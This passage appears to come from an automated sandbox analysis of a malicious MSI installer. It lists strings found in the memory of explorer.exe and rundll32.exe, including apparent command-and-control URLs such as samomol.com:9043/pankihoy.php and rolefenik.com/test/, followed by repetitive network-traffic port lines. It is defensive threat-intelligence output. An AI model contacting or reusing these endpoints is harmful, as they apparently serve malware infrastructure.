            Source: explorer.exe, 00000008.00000002.4590045694.000000000C354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077667382.000000000C354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3079194538.000000000C35C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ergiholim.com/S
            Source: explorer.exe, 00000008.00000002.4590045694.000000000C369000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4590045694.000000000C354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077667382.000000000C354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077667382.000000000C369000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4588467041.000000000BCFD000.00000004.00000010.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3080227376.00000000032B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3079194538.000000000C35C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3079194538.000000000C369000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ergiholim.com/test/
            Source: explorer.exe, 00000008.00000003.3077667382.000000000C354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3079194538.000000000C35C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ergiholim.com/test/_
            Source: explorer.exe, 00000008.00000003.3080227376.00000000032B1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ergiholim.com/test/bleSyncOnActivityFeed
            Source: explorer.exe, 00000008.00000002.4581549359.00000000098AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ergiholim.com/test/c
            Source: explorer.exe, 00000008.00000002.4590045694.000000000C354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077667382.000000000C354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3079194538.000000000C35C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ergiholim.com/test/g
            Source: explorer.exe, 00000008.00000003.3077667382.000000000C369000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3079194538.000000000C369000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ergiholim.com/test/p
            Source: explorer.exe, 00000008.00000000.2242782012.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3083287941.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2980843458.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4590045694.000000000C086000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com-
            Source: explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
            Source: explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
            Source: explorer.exe, 00000008.00000000.2242782012.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3083287941.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2980843458.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4590045694.000000000C086000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.come
            Source: explorer.exe, 00000008.00000000.2242782012.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4590045694.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comEMd
            Source: explorer.exe, 00000008.00000002.4590045694.000000000C369000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077667382.000000000C369000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3079194538.000000000C369000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/
            Source: explorer.exe, 00000008.00000002.4590045694.000000000C369000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077667382.000000000C369000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3079194538.000000000C369000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/K
            Source: explorer.exe, 00000008.00000003.3080227376.00000000032B1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/X
            Source: explorer.exe, 00000008.00000002.4590045694.000000000C369000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/c
            Source: explorer.exe, 00000008.00000002.4590045694.000000000C369000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/est/
            Source: explorer.exe, 00000008.00000002.4590045694.000000000C369000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4581549359.00000000098AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077667382.000000000C369000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4591202760.000000000C3E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3079194538.000000000C369000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/test/
            Source: explorer.exe, 00000008.00000002.4590045694.000000000C354000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/test/3
            Source: explorer.exe, 00000008.00000002.4581549359.00000000098AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/test/;
            Source: explorer.exe, 00000008.00000002.4590045694.000000000C369000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/test/K
            Source: explorer.exe, 00000008.00000002.4590045694.000000000C369000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077667382.000000000C369000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3079194538.000000000C369000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/test/g
            Source: explorer.exe, 00000008.00000002.4590045694.000000000BFDF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/test/~
            Source: rundll32.exe, 00000006.00000003.3335114775.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://samomol.com/
            Source: rundll32.exe, 00000006.00000003.3335114775.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://samomol.com/0P4a
            Source: rundll32.exe, 00000006.00000003.3335114775.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://samomol.com:9043/
            Source: rundll32.exe, 00000006.00000003.3335114775.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://samomol.com:9043/pankihoy.php
            Source: rundll32.exe, 00000006.00000003.3335114775.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://samomol.com:9043/pankihoy.php32
            Source: rundll32.exe, 00000006.00000003.3335114775.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://samomol.com:9043/pankihoy.php8O;a
            Source: rundll32.exe, 00000006.00000003.3335114775.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://samomol.com:9043/pankihoy.phpXP
            Source: rundll32.exe, 00000006.00000003.3335114775.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://samomol.com:9043/pankihoy.phpaOda
            Source: rundll32.exe, 00000006.00000003.3335114775.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://samomol.com:9043/pankihoy.phpd
            Source: explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 00000008.00000000.2238643975.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3075025138.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2980638609.00000000099AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/e
            Source: explorer.exe, 00000008.00000000.2242782012.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3083287941.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2980843458.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4590045694.000000000C086000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comM
            Source: medk.msi, MSI8F42.tmp.2.dr, MSI8D89.tmp.2.dr, MSI8D3A.tmp.2.dr, 6d8c4f.msi.2.dr, MSI8E67.tmp.2.dr, MSI8DD8.tmp.2.dr, MSI8E17.tmp.2.drString found in binary or memory: https://www.advancedinstaller.com
            Source: medk.msi, MSI8F42.tmp.2.dr, MSI8D89.tmp.2.dr, MSI8D3A.tmp.2.dr, 6d8c4f.msi.2.dr, MSI8E67.tmp.2.dr, MSI8DD8.tmp.2.dr, MSI8E17.tmp.2.drString found in binary or memory: https://www.digicert.com/CPS0
            Source: explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei
            Source: explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
            Source: explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
            Source: explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF
            Source: explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
            Source: explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
            Source: explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h
            Source: explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu
            Source: explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
            Source: explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
            Source: explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
            Source: explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-
            Source: explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-
            Source: explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
            Source: explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
            Source: medk.msi, MSI8F42.tmp.2.dr, MSI8D89.tmp.2.dr, MSI8D3A.tmp.2.dr, 6d8c4f.msi.2.dr, MSI8E67.tmp.2.dr, MSI8DD8.tmp.2.dr, MSI8E17.tmp.2.drString found in binary or memory: https://www.thawte.com/cps0/
            Source: medk.msi, MSI8F42.tmp.2.dr, MSI8D89.tmp.2.dr, MSI8D3A.tmp.2.dr, 6d8c4f.msi.2.dr, MSI8E67.tmp.2.dr, MSI8DD8.tmp.2.dr, MSI8E17.tmp.2.drString found in binary or memory: https://www.thawte.com/repository0W
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
            Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
            Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
            Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
            Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
            Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
            Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
            Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
            Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
            Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
            Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
            Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
            Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
            Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
            Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
            Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
            Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
            Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
            Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
            Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
            Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
            Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
            Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
            Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
            Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
            Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
            Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
            Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
            Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
            Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
            Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
            Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
